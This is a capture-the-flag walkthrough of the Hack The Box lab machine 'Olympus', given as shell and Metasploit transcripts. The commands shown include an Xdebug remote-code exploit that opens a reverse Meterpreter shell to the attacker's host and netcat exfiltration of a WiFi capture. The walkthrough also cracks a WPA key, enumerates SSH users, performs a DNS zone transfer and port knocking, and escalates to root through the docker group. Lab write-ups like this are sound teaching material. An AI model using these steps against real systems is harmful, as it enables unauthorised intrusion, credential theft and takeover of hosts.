Olympus
Starting with a port scan.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 |
root@n0w4n:~# nmap -v -n -T4 -sS -sV -sC -oN ~/htb/olympus/scan.nmap -p- 10.10.10.83 Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-04 19:06 CET Nmap scan report for 10.10.10.83 Host is up (0.033s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 22/tcp filtered ssh 53/tcp open domain (unknown banner: Bind) | dns-nsid: |_ bind.version: Bind | fingerprint-strings: | DNSVersionBindReqTCP: | version | bind |_ Bind 80/tcp open http Apache httpd |_http-favicon: Unknown favicon MD5: 399EAE2564C19BD20E855CDB3C0C9D1B | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache |_http-title: Crete island - Olympus HTB 2222/tcp open ssh (protocol 2.0) | fingerprint-strings: | NULL: |_ SSH-2.0-City of olympia | ssh-hostkey: | 2048 f2:ba:db:06:95:00:ec:05:81:b0:93:60:32:fd:9e:00 (RSA) | 256 79:90:c0:3d:43:6c:8d:72:19:60:45:3c:f8:99:14:bb (ECDSA) |_ 256 f8:5b:2e:32:95:03:12:a3:3b:40:c5:11:27:ca:71:52 (ED25519) NSE: Script Post-scanning. Initiating NSE at 19:07 Completed NSE at 19:07, 0.00s elapsed Initiating NSE at 19:07 Completed NSE at 19:07, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 65.53 seconds Raw packets sent: 66614 (2.931MB) | Rcvd: 65711 (2.628MB) |
So SSH port 22 is filtered, which overall means the packet is dropped (by a firewall).
There is an open port 2222 which runs a SSH server behind it.
There is also a webserver running on port 80 and finally a DNS server runs behind port 53.
With these results there are a few things off.
First port 22 which I already mentioned.
Also DNS is mostly UDP and if TCP port 53 is open for DNS it’s mostly for domain transfers (link)
On port 80 an Apache webserver is running, but unfortunately it doesn’t leak a version number.
There are a few DNS recon tools, but Kali has by default dnsrecon installed which can do a scan of a nameserver and try and find any subdomain registered.
It can take a while, so I’ll run it in the back with a for loop.
|
1 |
root@n0w4n:~/htb/olympus# for DOMAIN in 10.0.0.0/8 172.16.0.0/16 192.168.0.0/24; do dnsrecon -n 10.10.10.83 -r $DOMAIN --db dns_database; done |
On the website there is not that much. Just a picture.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 |
root@n0w4n:~/htb/olympus# curl -v 10.10.10.83 * Trying 10.10.10.83... * TCP_NODELAY set * Connected to 10.10.10.83 (10.10.10.83) port 80 (#0) > GET / HTTP/1.1 > Host: 10.10.10.83 > User-Agent: curl/7.62.0 > Accept: */* > < HTTP/1.1 200 OK < Date: Tue, 04 Dec 2018 19:12:46 GMT < Server: Apache < Vary: Accept-Encoding < X-Content-Type-Options: nosniff < X-Frame-Options: sameorigin < X-XSS-Protection: 1; mode=block < Xdebug: 2.5.5 < Content-Length: 314 < Content-Type: text/html; charset=UTF-8 < <!DOCTYPE HTML> <html> <head> <title>Crete island - Olympus HTB</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <link rel="shortcut icon" href="favicon.ico"> <link rel="stylesheet" type="text/css" href="crete.css"> </head> <body class="crete"> </body> * Connection #0 to host 10.10.10.83 left intact |
|
1 2 3 4 5 6 7 8 |
root@n0w4n:~/htb/olympus# wget 10.10.10.83/zeus.jpg --2018-12-04 20:11:29-- http://10.10.10.83/zeus.jpg Connecting to 10.10.10.83:80... connected. HTTP request sent, awaiting response... 200 OK Length: 37144 (36K) [image/jpeg] Saving to: ‘zeus.jpg’ zeus.jpg 100%[====================================================================================================================>] 36.27K --.-KB/s in 0.07s 2018-12-04 20:11:30 (540 KB/s) - ‘zeus.jpg’ saved [37144/37144] |
When I check it with exiftool and hexdump there is nothing odd about it. Why did I download the image?
In some CTF’s there are comments placed in the meta-data of an image or the image is used for steganography.
No comments here, so I’ll hang on to it if there is a hint about steganography or something.
In the curl output there is another thing that stands out:
Xdebug: 2.5.5
After some googling it looks like Xdebug is an extension for PHP to assist with debugging and development. It contains a single step debugger to use with IDEs (link).
Another hit that came up was for the use of a metasploit module.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 |
msf > use exploit/unix/http/xdebug_unauth_exec msf exploit(unix/http/xdebug_unauth_exec) > options Module options (exploit/unix/http/xdebug_unauth_exec): Name Current Setting Required Description ---- --------------- -------- ----------- PATH /index.php yes Path to target webapp Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST yes The target address RPORT 80 yes The target port (TCP) SRVHOST 0.0.0.0 yes Callback host for accepting connections SRVPORT 9000 yes Port to listen for the debugger SSL false no Negotiate SSL/TLS for outgoing connections VHOST no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf exploit(unix/http/xdebug_unauth_exec) > set rhost 10.10.10.83 rhost => 10.10.10.83 msf exploit(unix/http/xdebug_unauth_exec) > set lhost tun0 lhost => tun0 msf exploit(unix/http/xdebug_unauth_exec) > exploit [*] Started reverse TCP handler on 10.10.14.8:4444 [*] 10.10.10.83:80 - Waiting for client response. [*] 10.10.10.83:80 - Receiving response [*] 10.10.10.83:80 - Shell might take upto a minute to respond.Please be patient. [*] 10.10.10.83:80 - Sending payload of size 2026 bytes [*] Sending stage (38247 bytes) to 10.10.10.83 [*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.83:51148) at 2018-12-04 20:25:05 +0100 id meterpreter > |
|
1 2 3 4 5 6 |
meterpreter > sysinfo Computer : f00ba96171c5 OS : Linux f00ba96171c5 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) x86_64 Meterpreter : php/linux meterpreter > getuid Server username: www-data (33) |
I’ll jump onto the machine.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
cd / ls -lah total 72K drwxr-xr-x 1 root root 4.0K Apr 8 2018 . drwxr-xr-x 1 root root 4.0K Apr 8 2018 .. -rwxr-xr-x 1 root root 0 Apr 8 2018 .dockerenv drwxr-xr-x 1 root root 4.0K Apr 8 2018 bin drwxr-xr-x 2 root root 4.0K Jul 13 2017 boot drwxr-xr-x 5 root root 340 Dec 3 05:13 dev drwxr-xr-x 1 root root 4.0K Apr 8 2018 etc drwxr-xr-x 1 root root 4.0K Apr 8 2018 home drwxr-xr-x 1 root root 4.0K Apr 8 2018 lib drwxr-xr-x 2 root root 4.0K Oct 9 2017 lib64 drwxr-xr-x 2 root root 4.0K Oct 9 2017 media drwxr-xr-x 2 root root 4.0K Oct 9 2017 mnt drwxr-xr-x 2 root root 4.0K Oct 9 2017 opt dr-xr-xr-x 164 root root 0 Dec 3 05:13 proc drwx------ 1 root root 4.0K Apr 15 2018 root drwxr-xr-x 1 root root 4.0K Dec 1 2017 run drwxr-xr-x 1 root root 4.0K Apr 8 2018 sbin drwxr-xr-x 2 root root 4.0K Oct 9 2017 srv dr-xr-xr-x 13 root root 0 Dec 3 05:13 sys drwxrwxrwt 1 root root 4.0K Apr 8 2018 tmp drwxr-xr-x 1 root root 4.0K Oct 9 2017 usr drwxr-xr-x 1 root root 4.0K Dec 1 2017 var |
|
1 2 3 4 5 6 7 8 9 |
ip a 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever 7: eth0@if8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default link/ether 02:42:ac:14:00:02 brd ff:ff:ff:ff:ff:ff inet 172.20.0.2/16 brd 172.20.255.255 scope global eth0 valid_lft forever preferred_lft forever |
It looks like I’m in a docker environment.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 |
ls -lah /home total 12K drwxr-xr-x 1 root root 4.0K Apr 8 2018 . drwxr-xr-x 1 root root 4.0K Apr 8 2018 .. drwxr-xr-x 1 zeus zeus 4.0K Apr 8 2018 zeus ls -lah /home/zeus total 12K drwxr-xr-x 1 zeus zeus 4.0K Apr 8 2018 . drwxr-xr-x 1 root root 4.0K Apr 8 2018 .. drwxr-xr-x 1 zeus zeus 4.0K Apr 8 2018 airgeddon ls -lah /home/zeus/airgeddon total 1.1M drwxr-xr-x 1 zeus zeus 4.0K Apr 8 2018 . drwxr-xr-x 1 zeus zeus 4.0K Apr 8 2018 .. -rw-r--r-- 1 zeus zeus 264 Apr 8 2018 .editorconfig drwxr-xr-x 1 zeus zeus 4.0K Apr 8 2018 .git -rw-r--r-- 1 zeus zeus 230 Apr 8 2018 .gitattributes drwxr-xr-x 1 zeus zeus 4.0K Apr 8 2018 .github -rw-r--r-- 1 zeus zeus 89 Apr 8 2018 .gitignore -rw-r--r-- 1 zeus zeus 16K Apr 8 2018 CHANGELOG.md -rw-r--r-- 1 zeus zeus 3.2K Apr 8 2018 CODE_OF_CONDUCT.md -rw-r--r-- 1 zeus zeus 6.3K Apr 8 2018 CONTRIBUTING.md -rw-r--r-- 1 zeus zeus 3.3K Apr 8 2018 Dockerfile -rw-r--r-- 1 zeus zeus 35K Apr 8 2018 LICENSE.md -rw-r--r-- 1 zeus zeus 4.4K Apr 8 2018 README.md -rw-r--r-- 1 zeus zeus 291K Apr 8 2018 airgeddon.sh drwxr-xr-x 1 zeus zeus 4.0K Apr 8 2018 binaries drwxr-xr-x 1 zeus zeus 4.0K Apr 8 2018 captured drwxr-xr-x 1 zeus zeus 4.0K Apr 8 2018 imgs -rw-r--r-- 1 zeus zeus 16K Apr 8 2018 known_pins.db -rw-r--r-- 1 zeus zeus 670K Apr 8 2018 language_strings.sh -rw-r--r-- 1 zeus zeus 33 Apr 8 2018 pindb_checksum.txt |
|
1 2 3 4 5 6 7 8 9 |
cd /home/zeus/airgeddon/captured ls -lah total 304K drwxr-xr-x 1 zeus zeus 4.0K Apr 8 2018 . drwxr-xr-x 1 zeus zeus 4.0K Apr 8 2018 .. -rw-r--r-- 1 zeus zeus 291K Apr 8 2018 captured.cap -rw-r--r-- 1 zeus zeus 57 Apr 8 2018 papyrus.txt cat papyrus.txt Captured while flying. I'll banish him to Olympia - Zeus |
Let’s get the file over to my local machine
|
1 |
root@n0w4n:~/htb/olympus# nc -lp 9999 > captured.cap |
|
1 |
nc -w3 10.10.14.8 9999 < captured.cap |
And it’s send.
|
1 2 |
root@n0w4n:~/htb/olympus# file captured.cap captured.cap: tcpdump capture file (little-endian) - version 2.4 (802.11, capture length 65535) |
Opening the file with wireshark
SSID…..looks like WiFi.
Let’s check the wireless LAN option.
CCMP……looks like it is a WPA key.
A good way to crack a WPA key is with hashcat. Unfortunately I run Kali in a VM and it doesn’t like hashcat very much.
That’s why I use a somewhat older method with aircrack-ng.
|
1 2 3 4 5 6 7 8 9 10 11 |
root@n0w4n:~/htb/olympus# aircrack-ng -w /usr/share/wordlists/rockyou.txt captured.cap [00:22:04] 5306000/9822768 keys tested (4211.03 k/s) Time left: 17 minutes, 52 seconds 54.02% KEY FOUND! [ flightoficarus ] Master Key : FA C9 FB 75 B7 7E DC 86 CC C0 D5 38 88 75 B8 5A 88 3B 75 31 D9 C3 23 C8 68 3C DB FA 0F 67 3F 48 Transient Key : 20 05 27 E1 73 E0 73 F5 F1 2D AF D1 17 8B F8 27 C6 BE 23 E3 70 8A EF AE 6D 0C 89 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 EAPOL HMAC : AC 1A 73 84 FB BF 75 9C 86 CF 5B 5A F4 8A 4C 38 |
For this brute-force attempt I use the favorite CTF wordlist……rockyou.txt
Another method is to use john the ripper, but then you need to convert the cap file into a hccap file and then in a file which John can digest (can be done with hccap2john).
As I now have the WPA key I can decrypt the traffic.
The capture file has over 6000 packets, so to filter there are some things that can be done.
First there is the statistics option with protocol hierarchy. With this you can see all the used protocols and get a overview on what to target on.
Also I can use a display filter to filter out unwanted packets. In this case I use the ‘ip’ filter so I can see all the ip traffic and nothing else.
Unfortunately I can’t find anything useful in this capture file other then the cracked password. The password on itself may be the final objective for this capture file.
So a password reuse maybe?
|
1 2 3 4 5 6 7 |
ss -tupan Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port udp UNCONN 0 0 127.0.0.11:57019 *:* tcp LISTEN 0 128 *:80 *:* tcp LISTEN 0 128 127.0.0.11:43929 *:* tcp CLOSE-WAIT 0 0 172.20.0.2:51942 10.10.14.8:9000 users:(("ss",pid=27,fd=13),("sh",pid=22,fd=13),("sh",pid=21,fd=13)) tcp ESTAB 0 432 172.20.0.2:39186 10.10.14.8:5555 users:(("ss",pid=27,fd=14),("sh",pid=22,fd=14),("sh",pid=21,fd=14)) |
Nothing interesting is listening on this machine. So I go back to my local machine and try SSH on port 2222 with found username zeus and password flightoficarus
|
1 2 3 |
root@n0w4n:~/htb/olympus# ssh zeus@10.10.10.83 -p 2222 zeus@10.10.10.83's password: Permission denied, please try again. |
Not working. Maybe not the right username or password. Metasploit has a ssh enumeration module.
For this to work I need a list of usernames and because this machine has a clear theme.
I found a site with a nice list of the gods, but it’s not a straight list to download. Normally you can use a tool called CeWL to generate wordlists form websites. But because there is so much text on this site, it’s better to do it manually.
For this I found a website with a lot of names and copied the content into a file. Then I trim the file a bit to be of better use to metasploit.
|
1 |
root@n0w4n:~/htb/olympus# cat gods.list | awk '{print $1}' | tr '[:upper:]' '[:lower:]' > list.gods |
As check I also put in root as user, because in most cases root is a valid username.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 |
msf auxiliary(scanner/ssh/ssh_enumusers) > options Module options (auxiliary/scanner/ssh/ssh_enumusers): Name Current Setting Required Description ---- --------------- -------- ----------- CHECK_FALSE false no Check for false positives (random username) Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 10.10.10.83 yes The target address range or CIDR identifier RPORT 2222 yes The target port THREADS 1 yes The number of concurrent threads THRESHOLD 10 yes Amount of seconds needed before a user is considered found (timing attack only) USERNAME no Single username to test (username spray) USER_FILE ~/htb/olympus/list.gods no File containing usernames, one per line Auxiliary action: Name Description ---- ----------- Malformed Packet Use a malformed packet msf auxiliary(scanner/ssh/ssh_enumusers) > run [*] 10.10.10.83:2222 - SSH - Using malformed packet technique [*] 10.10.10.83:2222 - SSH - Starting scan [+] 10.10.10.83:2222 - SSH - User 'root' found [-] 10.10.10.83:2222 - SSH - User 'acestes' not found ..... {SNIPPED] ..... [-] 10.10.10.83:2222 - SSH - User 'iasion' not found [+] 10.10.10.83:2222 - SSH - User 'icarus' found [-] 10.10.10.83:2222 - SSH - User 'idomeneus' not found ..... [SNIPPED] ..... [-] 10.10.10.83:2222 - SSH - User 'zeus' not found [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed |
So there is a username other then root:
icarus
That makes sense as the SSID was
Too_cl0se_to_th3_Sun.
|
1 2 3 |
root@n0w4n:~/htb/olympus# ssh icarus@10.10.10.83 -p 2222 icarus@10.10.10.83's password: Permission denied, please try again. |
“flightoficarus” is not working? After some pondering I tried the SSID (because it was leet) and that worked as a password.
|
1 2 3 4 |
root@n0w4n:~/htb/olympus# ssh icarus@10.10.10.83 -p 2222 icarus@10.10.10.83's password: Last login: Sun Apr 15 16:44:40 2018 from 10.10.14.4 icarus@620b296204a3:~$ |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
icarus@620b296204a3:~$ ls -lah total 32K drwxr-xr-x 1 icarus icarus 4.0K Apr 15 2018 . drwxr-xr-x 1 root root 4.0K Apr 8 2018 .. -rw------- 1 icarus icarus 33 Apr 15 2018 .bash_history -rw-r--r-- 1 icarus icarus 220 Aug 31 2015 .bash_logout -rw-r--r-- 1 icarus icarus 3.7K Aug 31 2015 .bashrc drwx------ 2 icarus icarus 4.0K Apr 15 2018 .cache -rw-r--r-- 1 icarus icarus 655 May 16 2017 .profile -rw-r--r-- 1 root root 85 Apr 15 2018 help_of_the_gods.txt icarus@620b296204a3:~$ cat help_of_the_gods.txt Athena goddess will guide you through the dark... Way to Rhodes... ctfolympus.htb |
Still no user.txt
I guess I’m still not the user intended to find the first hash.
I got a hostname and the mentioning of Athena as goddess. But this username was already in my list….so that’s not a username for this box.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
icarus@620b296204a3:~$ ls -lah / total 72K drwxr-xr-x 1 root root 4.0K Apr 8 2018 . drwxr-xr-x 1 root root 4.0K Apr 8 2018 .. -rwxr-xr-x 1 root root 0 Apr 8 2018 .dockerenv drwxr-xr-x 2 root root 4.0K Feb 28 2018 bin drwxr-xr-x 2 root root 4.0K Apr 12 2016 boot drwxr-xr-x 5 root root 340 Dec 4 19:51 dev drwxr-xr-x 1 root root 4.0K Apr 8 2018 etc drwxr-xr-x 1 root root 4.0K Apr 8 2018 home drwxr-xr-x 1 root root 4.0K Sep 13 2015 lib drwxr-xr-x 2 root root 4.0K Feb 28 2018 lib64 drwxr-xr-x 2 root root 4.0K Feb 28 2018 media drwxr-xr-x 2 root root 4.0K Feb 28 2018 mnt drwxr-xr-x 2 root root 4.0K Feb 28 2018 opt dr-xr-xr-x 160 root root 0 Dec 4 19:51 proc drwx------ 1 root root 4.0K Apr 15 2018 root drwxr-xr-x 1 root root 4.0K Dec 5 08:08 run drwxr-xr-x 1 root root 4.0K Mar 6 2018 sbin drwxr-xr-x 2 root root 4.0K Feb 28 2018 srv dr-xr-xr-x 13 root root 0 Dec 4 19:51 sys drwxrwxrwt 1 root root 4.0K Apr 3 2018 tmp drwxr-xr-x 1 root root 4.0K Feb 28 2018 usr drwxr-xr-x 1 root root 4.0K Feb 28 2018 var |
I’m in another docker.
When I try to enumerate this machine I notice there are almost no tools installed.
From the initial nmap scan I know that there is a nameserver running. But than I had no domain name.
Let’s try a domain transfer with dig.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
root@n0w4n:~/htb/olympus# dig @10.10.10.83 ctfolympus.htb -t AXFR ; <<>> DiG 9.11.5-1-Debian <<>> @10.10.10.83 ctfolympus.htb -t AXFR ; (1 server found) ;; global options: +cmd ctfolympus.htb. 86400 IN SOA ns1.ctfolympus.htb. ns2.ctfolympus.htb. 2018042301 21600 3600 604800 86400 ctfolympus.htb. 86400 IN TXT "prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_F1re!" ctfolympus.htb. 86400 IN A 192.168.0.120 ctfolympus.htb. 86400 IN NS ns1.ctfolympus.htb. ctfolympus.htb. 86400 IN NS ns2.ctfolympus.htb. ctfolympus.htb. 86400 IN MX 10 mail.ctfolympus.htb. crete.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb. hades.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb. mail.ctfolympus.htb. 86400 IN A 192.168.0.120 ns1.ctfolympus.htb. 86400 IN A 192.168.0.120 ns2.ctfolympus.htb. 86400 IN A 192.168.0.120 rhodes.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb. RhodesColossus.ctfolympus.htb. 86400 IN TXT "Here lies the great Colossus of Rhodes" www.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb. ctfolympus.htb. 86400 IN SOA ns1.ctfolympus.htb. ns2.ctfolympus.htb. 2018042301 21600 3600 604800 86400 ;; Query time: 30 msec ;; SERVER: 10.10.10.83#53(10.10.10.83) ;; WHEN: Wed Dec 05 09:24:01 CET 2018 ;; XFR size: 15 records (messages 1, bytes 475) |
Some comments:
"prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_F1re!"
RhodesColossus.ctfolympus.htb. 86400 IN TXT "Here lies the great Colossus of Rhodes"
The first one has again a string with leet, which looks like a password and 3 numbers.
The three numbers and the reference to temporal has port knocking written all over it.
There are several ways to knock on a port. You can use nmap, telnet, netcat or as I’m doing…..use knock (you need knockd installed for this).
|
1 |
root@n0w4n:~/htb/olympus# knock 10.10.10.83 3456 8234 62431 |
|
1 2 3 4 5 6 7 8 9 10 11 |
root@n0w4n:~/htb/olympus# nmap -n -T4 -p- 10.10.10.83 Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-05 09:43 CET Nmap scan report for 10.10.10.83 Host is up (0.033s latency). Not shown: 65531 closed ports PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain 80/tcp open http 2222/tcp open EtherNetIP-1 Nmap done: 1 IP address (1 host up) scanned in 40.38 seconds |
Another port scan reveals port 22 to be open.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
root@n0w4n:~/htb/olympus# ssh prometheus@10.10.10.83 The authenticity of host '10.10.10.83 (10.10.10.83)' can't be established. ECDSA key fingerprint is SHA256:8TR2+AWSBT/c5mrjpDotoEYu0mEy/jCzpuS79d+Z0oY. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '10.10.10.83' (ECDSA) to the list of known hosts. prometheus@10.10.10.83's password: Welcome to ) ( ( /( ) )\ ) ( )\()) ( /( (()/( ))\ ( ((_)\ )(_)) ((_))/((_))\ | |(_)((_)_ _| |(_)) ((_) | ' \ / _` |/ _` |/ -_)(_-< |_||_|\__,_|\__,_|\___|/__/ prometheus@olympus:~$ |
|
1 2 3 4 5 6 7 8 9 10 11 12 |
prometheus@olympus:~$ ls -lah ~ total 28K drwxr-xr-x 2 prometheus prometheus 4.0K Apr 8 2018 . drwxr-xr-x 3 root root 4.0K Apr 4 2018 .. -rw------- 1 root root 0 Apr 8 2018 .bash_history -rw-r--r-- 1 prometheus prometheus 220 Apr 2 2018 .bash_logout -rw-r--r-- 1 prometheus prometheus 3.6K Apr 4 2018 .bashrc -rw-r----- 1 root prometheus 248 Apr 8 2018 msg_of_gods.txt -rw-r--r-- 1 prometheus prometheus 675 Apr 2 2018 .profile -rw-r----- 1 root prometheus 33 Apr 4 2018 user.txt prometheus@olympus:~$ cat ~/user.txt [no spoilers] |
Finally………the first flag.
Now on to getting root.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 |
prometheus@olympus:~$ ip a | grep inet inet 127.0.0.1/8 scope host lo inet 10.10.10.83/24 brd 10.10.10.255 scope global enp0s3 inet 172.19.0.1/16 brd 172.19.255.255 scope global br-0a8ad598ebee inet 172.18.0.1/16 brd 172.18.255.255 scope global br-2668d8e07649 inet 172.20.0.1/16 brd 172.20.255.255 scope global br-c8834ba5f981 inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0 prometheus@olympus:~$ ls -lah / total 84K drwxr-xr-x 22 root root 4.0K Apr 2 2018 . drwxr-xr-x 22 root root 4.0K Apr 2 2018 .. drwxr-xr-x 2 root root 4.0K Apr 15 2018 bin drwxr-xr-x 3 root root 4.0K Apr 15 2018 boot drwxr-xr-x 17 root root 3.1K Dec 4 12:50 dev drwxr-xr-x 85 root root 4.0K Apr 15 2018 etc drwxr-xr-x 3 root root 4.0K Apr 4 2018 home lrwxrwxrwx 1 root root 29 Apr 2 2018 initrd.img -> boot/initrd.img-4.9.0-6-amd64 lrwxrwxrwx 1 root root 29 Apr 2 2018 initrd.img.old -> boot/initrd.img-4.9.0-4-amd64 drwxr-xr-x 16 root root 4.0K Apr 2 2018 lib drwxr-xr-x 2 root root 4.0K Apr 2 2018 lib64 drwx------ 2 root root 16K Apr 2 2018 lost+found drwxr-xr-x 3 root root 4.0K Apr 2 2018 media drwxr-xr-x 2 root root 4.0K Apr 2 2018 mnt drwxr-xr-x 2 root root 4.0K Apr 2 2018 opt dr-xr-xr-x 167 root root 0 Dec 4 12:50 proc drwx------ 4 root root 4.0K Apr 15 2018 root drwxr-xr-x 17 root root 600 Dec 5 01:28 run drwxr-xr-x 2 root root 4.0K Apr 15 2018 sbin drwxr-xr-x 2 root root 4.0K Apr 2 2018 srv dr-xr-xr-x 13 root root 0 Dec 5 01:13 sys drwxrwxrwt 9 root root 4.0K Dec 5 01:38 tmp drwxr-xr-x 10 root root 4.0K Apr 2 2018 usr drwxr-xr-x 11 root root 4.0K Apr 2 2018 var lrwxrwxrwx 1 root root 26 Apr 2 2018 vmlinuz -> boot/vmlinuz-4.9.0-6-amd64 lrwxrwxrwx 1 root root 26 Apr 2 2018 vmlinuz.old -> boot/vmlinuz-4.9.0-4-amd64 |
I’m not in a docker anymore.
|
1 2 |
prometheus@olympus:~$ id uid=1000(prometheus) gid=1000(prometheus) groups=1000(prometheus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),111(bluetooth),999(docker) |
Looks like I don’t have SUDO, but I do have access to the docker group which give the opportunity to elevate your rights as being a member of the docker group is the same as giving a user full root access to the system (link).
The way I’m going to get root is to mount the root folder to a bind docker. The steps and explanation can be found here.
Docker has a very useful menu function whereas you just have to give an argument (command) and with –help you get another list of possibilities.
|
1 2 3 4 5 |
prometheus@olympus:~$ docker container ls CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES f00ba96171c5 crete "docker-php-entrypoi…" 8 months ago Up 13 hours 0.0.0.0:80->80/tcp crete ce2ecb56a96e rodhes "/etc/bind/entrypoin…" 8 months ago Up 13 hours 0.0.0.0:53->53/tcp, 0.0.0.0:53->53/udp rhodes 620b296204a3 olympia "/usr/sbin/sshd -D" 8 months ago Up 13 hours 0.0.0.0:2222->22/tcp olympia |
|
1 2 3 |
prometheus@olympus:~$ docker run -v /root:/tmp/n0w4n -ti rodhes bash cat: /etc/hostip: No such file or directory root@09c736226d89:/# |
With docker -v I binded /root to /tmp/n0w4n
|
1 2 3 4 5 6 7 8 9 10 11 12 13 |
root@09c736226d89:/# cd /tmp/n0w4n/ root@09c736226d89:/tmp/n0w4n# ls -lah total 28K drwx------ 4 root root 4.0K Apr 15 2018 . drwxrwxrwt 1 root root 4.0K Dec 5 09:05 .. -rw------- 1 root root 0 Apr 15 2018 .bash_history -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc drwx------ 2 root root 4.0K Apr 2 2018 .cache drwxr-xr-x 2 root root 4.0K Apr 15 2018 .nano -rw-r--r-- 1 root root 148 Aug 17 2015 .profile -r-------- 1 root root 33 Apr 4 2018 root.txt root@09c736226d89:/tmp/n0w4n# cat root.txt [no spoilers] |
On entering that container /root was mounted in /tmp/n0w4n
And there is the final flag.
Normally I don’t really like CTF minded machines on HTB, but this one was really fun to do.